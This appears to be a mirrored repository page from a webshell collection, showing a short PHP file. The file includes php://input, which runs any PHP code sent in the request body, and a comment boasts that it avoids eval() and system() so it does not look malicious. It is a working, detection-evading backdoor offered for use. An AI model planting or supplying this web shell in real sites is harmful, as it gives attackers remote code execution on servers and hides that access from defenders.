mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 21:01:29 +00:00
6 lines
179 B
PHP
6 lines
179 B
PHP
<?php
|
|
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
|
// No eval() calls, no system() calls, nothing normally seen as malicious.
|
|
include('php://input');
|
|
?>
|